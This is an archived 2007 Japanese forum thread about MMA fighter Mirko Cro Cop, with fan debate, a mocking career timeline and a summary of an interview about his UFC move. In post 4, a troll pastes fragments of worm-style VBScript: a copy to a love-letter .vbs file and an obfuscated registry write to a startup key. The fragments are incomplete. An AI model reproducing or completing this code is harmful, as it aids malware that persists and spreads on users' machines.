5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ミルコ Mirko“CRO ◆150◆ COP”Filipovic

1 :実況厳禁@名無しの格闘家:2007/01/15(月) 08:30:13 ID:iFiyWe2X
公式サイト http://www.mirko-crocop.com/
blog http://sports.nifty.com/crocop/
NOKAUT official CROCOP webshop
http://www.nokaut.com/
がんばれクロアチア(ミルコ)!!
http://jts.jugem.cc/
ミルコさんのハイキック
http://nikohu.seesaa.net/
プロフィール
http://www.prideofficial.com/free/fighters/details/1091194912.html
戦績
http://www.sherdog.com/fightfinder/fightfinder.asp?FighterID=2326
写真
http://www.susumug.com/jp/fighter/77
ミルコ・クロコップ 未完成という魅力。
http://number.goo.ne.jp/kakutogi/658/20060803-f2-1.html

wikipedia
http://ja.wikipedia.org/wiki/%E3%83%9F%E3%83%AB%E3%82%B3%E3%83%BB%E3%82%AF%E3%83%AD%E3%82%B3%E3%83%83%E3%83%97

過去ログ http://k1log.hp.infoseek.co.jp/mirco_crocop.html
http://sapporo.cool.ne.jp/k1log/mirco_crocop.html http://k1log.e-city.tv/mirco_crocop.html

前スレ http://ex18.2ch.net/test/read.cgi/k1/1167710329/l50

■スレ立てでタイトルを何でもアンチパンクラスに絡める通称マサオ、アンパンマンについてはこちら
http://jbbs.livedoor.jp/bbs/read.cgi/sports/24816/1125119866/l50

2 :実況厳禁@名無しの格闘家:2007/01/15(月) 08:36:58 ID:rRY4QXg/



3 :実況厳禁@名無しの格闘家:2007/01/15(月) 08:38:13 ID:298jBuCl
3

4 :ミル値アップ!:2007/01/15(月) 08:43:25 ID:wGS6+hVl
<ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

5 :実況厳禁@名無しの格闘家:2007/01/15(月) 08:47:56 ID:0IVfpK1e
>>1


6 :糞コ糞すぎる最低へたれ値アップ!:2007/01/15(月) 11:26:21 ID:91/ahnyK
wwwwwwwwwwwwwwwwwww
糞糞糞糞wwwwwwwwwwwwwwwwww

7 :WE ARE MASTER ◆0Dl90rpoZU :2007/01/15(月) 22:48:50 ID:9DsxSy97
>>4
いっつもいっつもウイルス貼んな、カス

8 :実況厳禁@名無しの格闘家:2007/01/15(月) 23:38:46 ID:KQIqisi/
ミルコは腰負傷のアーツに大苦戦し、マクドナルドにすらボコされ、ホーストに三連敗した弱い選手なんです・・・。

9 :実況厳禁@名無しの格闘家:2007/01/15(月) 23:43:06 ID:QqlDZ8D3
晒しage
sageでボソボソ煽ってんじゃねえよカス

10 :実況厳禁@名無しの格闘家:2007/01/15(月) 23:48:36 ID:KQIqisi/
事実上ドクターストップ状態のアーツにあの試合はマズイでしょ・・
マクドナルド戦も挑発して余裕こいてた直後ボコされてるし・・

11 :実況厳禁@名無しの格闘家:2007/01/16(火) 00:13:02 ID:PBeZEs1c
まあK-1では雑魚だったし今更いいだろ

12 :WE ARE MASTER ◆0Dl90rpoZU :2007/01/16(火) 00:39:04 ID:p3PagdMy
>>10お前の大好きなシウバはミルコにシバかれたがなwwwwwwwwwwwwwwww

13 :実況厳禁@名無しの格闘家:2007/01/16(火) 02:51:59 ID:lHQ97K2x
4,6,7,12が見えない

14 :実況厳禁@名無しの格闘家:2007/01/16(火) 23:56:05 ID:p3PagdMy
age

15 :実況厳禁@名無しの格闘家:2007/01/17(水) 01:36:56 ID:GwYHMIGs
そんなミルコにぼこられたバンナが最弱ですね

16 :実況厳禁@名無しの格闘家:2007/01/18(木) 17:08:09 ID:8E/eRk2C
ヘビーでいくのか、ライトヘビーでいくのか、はっきりせいや!

17 :実況厳禁@名無しの格闘家:2007/01/18(木) 17:42:16 ID:80L52t2A
2001年】
K−1に後ろ足で泥をブッかけPRIDE参戦も
ロートルの高田延彦相手に痛恨の引き分け。

【2002年】
大ブーイングの中、ワガママを通し変則ルールでのシウバ戦を
実現させるも5R引き分け。ミノタウロに「シウバの勝ち」と明言される。

【2003年】
その憎き敵ミノタウロ相手に半泣き土下座タップの醜態を晒し
お茶の間の笑い者になる。

【2004年】
調子に乗って映画撮影。
グランプリ開幕戦(※1)でランデルマンにあっさり葬られる。

【2005年】
父に会いに行くなどと妄言を発しながら王者ヒョードルと戦うも
勝てるはずもなく、打撃でボコられ半泣きになりながら退場。

【2006年】
グランプリで3戦連続で階級下の相手と戦うという
あからさまな贔屓のあげく優勝。
本人は感動し一人で号泣も周囲は呆れ返る。
シウバ曰く「今日はミルコの日だった(※2)」
直後、PRIDEに後ろ足で泥をブッかけUFC移籍。


(※1 同じく開幕戦で敗退した選手には戦闘竜、高橋義生など)
(※2 ミルコのために用意されたグランプリという意味)

18 :実況厳禁@名無しの格闘家:2007/01/19(金) 10:38:32 ID:xmMRt3mi
mirko

19 :sage:2007/01/19(金) 10:45:21 ID:ovh/fo0h
まあミルコが世界最強なのは確定してるんだからひがむなよてめーらは(^O^)/
誰のファンか知らねーけど恥ずかしい奴らめ(゜▽゜

20 :実況厳禁@名無しの格闘家:2007/01/19(金) 10:45:48 ID:V6PL8DgM
どうせすぐタイトル取るんだろうけど、その後は格闘技やめて俳優デビューか。
つまんね。

21 :実況厳禁@名無しの格闘家:2007/01/19(金) 11:35:33 ID:Pb14zyKv
>>19あんまマジでいうなよ
泣いちゃうだろwwwwwwwwwwwww

22 :実況厳禁@名無しの格闘家:2007/01/20(土) 20:24:39 ID:ON36RKj+
本スレあげ
ミルコ絶対最強ー!ヽ(^∀^)ノ

23 :実況厳禁@名無しの格闘家:2007/01/20(土) 22:17:12 ID:HR1Kiynl
>>8 そのミルコがKOした大山に負けたアーツ サップに負けたホースト きりがない。今のミルコは強い

24 :実況厳禁@名無しの格闘家:2007/01/20(土) 22:20:00 ID:/I/pNUnn
>>23
だれだれに負けたなになに、とか言うのはレベルが低いから止めたほうがいいとおもう。

25 :実況厳禁@名無しの格闘家:2007/01/20(土) 22:24:21 ID:tk4oGPxg
最近筋トレしてるけど、ミルコの背中憧れるな〜

26 :実況厳禁@名無しの格闘家:2007/01/20(土) 23:37:19 ID:HR1Kiynl
>>24 そうゆう書き込みに対してきりがないって言ったんだよ!とにかくミルコ頑張って〜↑↑

27 :実況厳禁@名無しの格闘家:2007/01/22(月) 19:15:32 ID:WtmJywwa
ミルコ最強

28 :実況厳禁@名無しの格闘家:2007/01/24(水) 23:44:30 ID:ynjhTeHx
age

29 :晴晴晴〃【fine】  ◆63Nrwk.mWM :2007/01/25(木) 03:24:18 ID:aTFX0vRJ
ヤッホ!

30 :実況厳禁@名無しの格闘家:2007/01/25(木) 04:37:52 ID:I6yYEFEN
事実上ドクターストップ状態のアーツ

↑恥ずかしい捏造すんなよ

31 :もっへ ◆y.YhWPrYZc :2007/01/25(木) 06:51:46 ID:wPbL29b1
重複ですねえ

32 :実況厳禁@名無しの格闘家:2007/01/25(木) 14:47:37 ID:N67v9Bir
>>30
アーツは館長に無理やり出されてたんだが。座るだけで腰が痛いと言っている程ね。
医師の言うとおりにしていればこんな状態にはならなかった。
ってか当時のK-1見てれば普通に分かる事だろ・・・

33 :実況厳禁@名無しの格闘家:2007/01/25(木) 22:42:59 ID:3cOejcrX
こっちがホンスレ?

34 :もっへ ◆y.YhWPrYZc :2007/01/26(金) 16:53:35 ID:Oatyu/bG
>>33
違いますよ。

35 :実況厳禁@名無しの格闘家:2007/01/26(金) 16:58:34 ID:feQsBm2g
粘着カッコ悪い

36 :もっへ ◆y.YhWPrYZc :2007/01/26(金) 18:00:01 ID:oaKk/rF+
>>35
そうだね♪

37 :実況厳禁@名無しの格闘家:2007/01/26(金) 19:13:57 ID:jYd+h9zv
http://blog.goo.ne.jp/hiroshi_nielsen/e/734758cf59deeca27970c09aa102cb0a

1/23発売『ゴング格闘技』掲載のミルコ・クロコップ選手のインタビューが海外メディアでも話題になっています。
インタビュ−で、ミルコ選手がPRIDEへの思い、今年大晦日にでも(!)日本で試合woしたい、など意外なコメントがありまして。
以下、ポイントだけ箇条書きにしてみました。

●ダナ・ホワイトはミルコに、デビュー戦でいきなりティム・シルビアの王座に挑戦させようとした。(が、実現しなかったのは)ティムが逃げたからじゃないのか?と。

●UFCとの契約は6試合/2年間か?との問いに対し「2年間もかけるつもりはない」と回答。もっとハイペースで試合を消化する意気込み

●王座挑戦〜ベルト奪取は3戦目の予定だ、という

●今年夏までにベルトをとって、その後秋に1回防衛戦をして、今年大晦日に日本で試合をやる、というのがミルコの個人的な希望。

●日本でPRIDEとUFCの合同興行を実現させたい、それがミルコの本音とのこと

●結局、ヒョードル戦への並々ならぬ意欲は依然強い

●今回のUFC参戦がPRIDEとの永遠の別れだなんて思っていない

●知人宅でPRIDEのビデオを観た時に、あの「ダンダンダダン」というテーマ曲が流れて来た時、
「どうしようもない寂しさで、胸がいっぱいになった」
「急に胸がざわついたんだ」
「ああ、俺はあの音楽をしばらく生で聴けないんだな」
と思った。

●UFCのグローブはPRIDEのものより薄い。またバンデージの長さが規則で決まっている。パンチ力が強いため拳を傷めないようバンデージを厚めに巻きたいミルコにとって、この部分は悩ましい。

38 :もっへ ◆y.YhWPrYZc :2007/01/26(金) 19:44:49 ID:IXJ+L+cR
重複ですねえ

39 :実況厳禁@名無しの格闘家:2007/01/26(金) 19:53:00 ID:Z2f1YbbZ
ミルコのリップサービスに近いと思う。 
願望はあるけど、実際は大晦日やプライド復帰なんか10%もないと思ってるだろうね 
後1〜2年でプライドのPPVが軒並み50万件超えるようにでもならないとありえない 


40 :実況厳禁@名無しの格闘家:2007/01/26(金) 20:11:44 ID:Z2f1YbbZ
>>34
>>36 
>>38
それなんか意味あるの? 
そんな細かい事より、先に秋山スレ乱発をなんとかしてくれよ 
結局何もできないんでしょ?

41 :もっへ ◆y.YhWPrYZc :2007/01/26(金) 20:44:56 ID:IXJ+L+cR
重複ですねえ

42 :実況厳禁@名無しの格闘家:2007/01/26(金) 20:56:06 ID:Z2f1YbbZ
ただの趣味かw
コントール、ヒッヒと同じようなもんか 


重複ですねえwww

43 :もっへ ◆y.YhWPrYZc :2007/01/26(金) 21:31:36 ID:IXJ+L+cR
重複ですねえ

ホンスレに移動してください。

44 :実況厳禁@名無しの格闘家:2007/01/27(土) 23:03:25 ID:fuYKnxTh
ホンスレは>>43が作ったんしょ?ちゃう?

45 :実況厳禁@名無しの格闘家:2007/01/27(土) 23:08:50 ID:fuYKnxTh
あげ

46 :実況厳禁@名無しの格闘家:2007/01/28(日) 16:01:10 ID:ePhLslcy
ミルコって本当に強いんかな?

47 :実況厳禁@名無しの格闘家:2007/01/28(日) 16:39:31 ID:MM7wsylJ
強いよ。最強にはあと数歩及ばないけどね。

48 :実況厳禁@名無しの格闘家:2007/01/28(日) 16:40:52 ID:CW0uo4ze
総合では強いけどK-1だと微妙

49 :実況厳禁@名無しの格闘家:2007/01/28(日) 17:22:11 ID:TdgEylXO
別にKはどうでもいいと思う。最後に立ち技の試合したの4年前だし。

50 :実況厳禁@名無しの格闘家:2007/02/01(木) 23:51:07 ID:QH318m7A
黙れもっへ

51 :実況厳禁@名無しの格闘家:2007/02/02(金) 01:00:43 ID:/3HEoJI2
UFJで最初の試合いつやるの?

52 :実況厳禁@名無しの格闘家:2007/02/02(金) 03:56:46 ID:kutz1ta2
そこじゃ、試合どころか上半身裸で居続ける事も難しいだろう

53 :実況厳禁@名無しの格闘家:2007/02/03(土) 15:38:28 ID:DWqsD0S1
なんだ?いくつ立ってるんだ?

54 :実況厳禁@名無しの格闘家:2007/02/03(土) 15:40:15 ID:2BILyFdS
エディ・サンチェスのKO負けってのはまずありえないから、先に根負けするのはミルコさん(笑)


55 :WE ARE MASTER ◆0Dl90rpoZU :2007/02/03(土) 15:46:57 ID:likFPjYM
↓こっちが本スレ

http://ex18.2ch.net/test/read.cgi/k1/1170483760/l50

56 :実況厳禁@名無しの格闘家:2007/02/03(土) 22:41:36 ID:eTLsoFxP
ミルコがKO負けでもしたら、秋山、KDIに続く祭りだな

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)